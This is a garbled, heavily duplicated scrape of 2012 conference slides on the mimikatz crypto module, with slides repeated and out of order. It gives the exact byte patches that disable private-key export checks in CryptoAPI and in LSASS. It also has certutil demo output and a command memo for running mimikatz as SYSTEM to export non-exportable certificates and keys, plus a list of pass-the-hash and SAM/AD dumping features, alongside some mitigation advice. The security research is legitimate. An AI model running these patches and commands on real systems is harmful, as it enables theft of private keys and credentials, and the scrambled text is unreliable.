mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
